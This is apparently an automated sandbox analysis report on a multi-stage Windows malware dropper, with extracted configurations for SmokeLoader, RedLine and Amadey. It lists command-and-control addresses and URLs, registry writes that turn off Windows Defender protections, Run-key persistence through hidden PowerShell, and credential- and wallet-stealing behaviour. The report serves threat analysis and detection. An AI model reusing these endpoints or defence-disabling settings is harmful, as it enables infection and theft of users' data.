Analysis
-
max time kernel
101s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
19/10/2023, 13:03
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230915-en
General
-
Target
file.exe
-
Size
865KB
-
MD5
57dcd77d3092a5d088233e633c2e0990
-
SHA1
f6cdddb86c8d097064ca4a2ad4b4deeeb2b4c89e
-
SHA256
d14f3781a88172e83ee0797e6388a05c9a1cf8026ccaa0331c86ad8a72ec5775
-
SHA512
dcdc63a3bb3ad6fd7f9d488d6322e26f43bdff5da278b66d24c3b28e7192c38fa10e5f1203f8df0ba1e6e903817138f6760e9a00b502525060810f423438e807
-
SSDEEP
24576:Sy9tS+gfMWxf0eHpkGtk1weze4+F02scbV:5a+QMqfvpkX1wezcXr
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
breha
77.91.124.55:19071
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
redline
kukish
77.91.124.55:19071
Extracted
redline
pixelscloud2.0
85.209.176.128:80
Extracted
redline
@ytlogsbot
185.216.70.238:37515
Extracted
redline
5141679758_99
https://pastebin.com/raw/8baCJyMF
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Signatures
-
DcRat 4 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 3512 schtasks.exe 1420 schtasks.exe 464 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" file.exe -
Glupteba payload 4 IoCs
resource yara_rule behavioral2/memory/5652-503-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5652-556-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5652-566-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/404-609-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 1fX89KT6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" A5C5.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 1fX89KT6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 1fX89KT6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 1fX89KT6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 1fX89KT6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 1fX89KT6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" A5C5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" A5C5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" A5C5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" A5C5.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 17 IoCs
resource yara_rule behavioral2/files/0x000600000002309c-52.dat family_redline behavioral2/files/0x000600000002309c-53.dat family_redline behavioral2/memory/5036-55-0x0000000000C40000-0x0000000000C7E000-memory.dmp family_redline behavioral2/files/0x00060000000230ba-95.dat family_redline behavioral2/files/0x00070000000230bb-106.dat family_redline behavioral2/files/0x00070000000230bb-107.dat family_redline behavioral2/files/0x00060000000230c2-138.dat family_redline behavioral2/files/0x00060000000230c2-139.dat family_redline behavioral2/files/0x000300000001e6c0-144.dat family_redline behavioral2/memory/3040-147-0x0000000000390000-0x00000000003CE000-memory.dmp family_redline behavioral2/files/0x000300000001e6c1-154.dat family_redline behavioral2/files/0x000300000001e6c1-153.dat family_redline behavioral2/files/0x000300000001e6c0-156.dat family_redline behavioral2/memory/1912-158-0x0000000000290000-0x00000000002AE000-memory.dmp family_redline behavioral2/memory/2148-157-0x0000000000600000-0x000000000065A000-memory.dmp family_redline behavioral2/memory/4704-165-0x0000000000FF0000-0x000000000104A000-memory.dmp family_redline behavioral2/memory/1876-221-0x0000000000400000-0x000000000043E000-memory.dmp family_redline -
SectopRAT payload 3 IoCs
resource yara_rule behavioral2/files/0x000300000001e6c0-144.dat family_sectoprat behavioral2/files/0x000300000001e6c0-156.dat family_sectoprat behavioral2/memory/1912-158-0x0000000000290000-0x00000000002AE000-memory.dmp family_sectoprat -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 5320 netsh.exe -
Stops running service(s) 3 TTPs
-
.NET Reactor proctector 20 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/4972-129-0x00000000022B0000-0x00000000022D0000-memory.dmp net_reactor behavioral2/memory/4972-146-0x0000000002520000-0x000000000253E000-memory.dmp net_reactor behavioral2/memory/4972-150-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-152-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-159-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-166-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-170-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-173-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-176-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-183-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-191-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-186-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-199-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-195-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-202-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-210-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-213-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-215-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/4972-217-0x0000000002520000-0x0000000002538000-memory.dmp net_reactor behavioral2/memory/3040-255-0x0000000007310000-0x0000000007320000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation A6FE.exe Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation explothe.exe Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation 9D.exe -
Executes dropped EXE 33 IoCs
pid Process 4120 VH4vX77.exe 2196 ro8sA21.exe 2744 DO2BB55.exe 3408 TK1xO34.exe 2716 1fX89KT6.exe 3304 2Pm6119.exe 4472 3qu90Pt.exe 5036 4HS096BX.exe 1916 9F58.exe 4124 AH0ga1vM.exe 1664 A0FF.exe 3904 qS9tw1uX.exe 632 sC2xv8pP.exe 3696 A46C.exe 4800 hd8Im5XM.exe 4972 A5C5.exe 2992 1AP90VT0.exe 2596 A6FE.exe 2148 A98F.exe 3040 2ki127Ll.exe 1912 AAB9.exe 4704 AEB2.exe 4472 B952.exe 4004 explothe.exe 6016 9D.exe 4456 4F3.exe 816 5DE.exe 5236 B1F.exe 5372 toolspub2.exe 5652 31839b57a4f11171d6abc8bbc4451ee4.exe 5864 toolspub2.exe 5152 latestX.exe 404 31839b57a4f11171d6abc8bbc4451ee4.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 1fX89KT6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1fX89KT6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" A5C5.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\5DE.exe'\"" 5DE.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" file.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" ro8sA21.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" TK1xO34.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" sC2xv8pP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\"" hd8Im5XM.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" VH4vX77.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" DO2BB55.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" 9F58.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" AH0ga1vM.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" qS9tw1uX.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4472 set thread context of 1876 4472 B952.exe 130 PID 5372 set thread context of 5864 5372 toolspub2.exe 164 -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5088 sc.exe 5908 sc.exe 1836 sc.exe 1876 sc.exe 1352 sc.exe 4916 sc.exe 2316 sc.exe 1300 sc.exe 3284 sc.exe 4928 sc.exe 1136 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3qu90Pt.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3qu90Pt.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3qu90Pt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3512 schtasks.exe 1420 schtasks.exe 464 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
